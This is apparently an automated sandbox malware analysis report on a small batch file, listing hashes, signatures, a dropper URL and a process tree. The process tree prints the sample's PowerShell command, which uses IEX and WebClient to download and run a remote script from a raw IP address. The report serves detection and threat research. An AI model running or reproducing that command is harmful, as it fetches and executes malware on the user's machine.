Analysis
max time kernel: 88s
max time network: 150s
platform: windows10_x64
resource: win10
submitted: 23-06-2020 03:10
Static task: static1
Behavioral task: behavioral1
  Sample: ba14ab3ed6e7b7ab08b7add2a00958b9.bat
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: ba14ab3ed6e7b7ab08b7add2a00958b9.bat
  Resource: win10 (windows10_x64)
  0 signatures, 0 seconds
General
Target: ba14ab3ed6e7b7ab08b7add2a00958b9.bat
Size: 216B
MD5: be80d5e6a14a15ec34832dbba9abf139
SHA1: 3f56abfb2adcb556bdabeac9b92de7520a81ccbf
SHA256: c21697f0b7e8c644cf9bc515972a1ec3b8c3c357c123dd8b06c1fa1f93e6b88b
SHA512: 20f8041a4f2f000a47bb0f9fb7c4af1b8f4842c6706252ccc4abda665be8f7ae22b1a6d8385a19bc1d0f1e006ffb667334d127cbd70bf66a58e146b039dcd73d
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Source
  URLs:
    ps1.dropper  http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9
Signatures

Suspicious use of WriteProcessMemory (3 IoCs)
Processes: cmd.exe
  description                        pid   process   target process
  PID 3060 wrote to memory of 3888   3060  cmd.exe   powershell.exe
  PID 3060 wrote to memory of 3888   3060  cmd.exe   powershell.exe
  PID 3060 wrote to memory of 3888   3060  cmd.exe   powershell.exe

Program crash (1 IoCs)
Processes: WerFault.exe
  pid   pid_target  process       target process
  3792  3888        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: WerFault.exe
  description                pid   process
  Token: SeRestorePrivilege  3792  WerFault.exe
  Token: SeBackupPrivilege   3792  WerFault.exe
  Token: SeDebugPrivilege    3792  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes: WerFault.exe
  pid   process
  3792  WerFault.exe  (14 identical entries)
Processes

1. C:\Windows\system32\cmd.exe (PID: 3060)
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ba14ab3ed6e7b7ab08b7add2a00958b9.bat"
   Signatures: Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 3888)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ba14ab3ed6e7b7ab08b7add2a00958b9');Invoke-PYHZVCNXW;Start-Sleep -s 10000"

      3. C:\Windows\SysWOW64\WerFault.exe (PID: 3792)
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses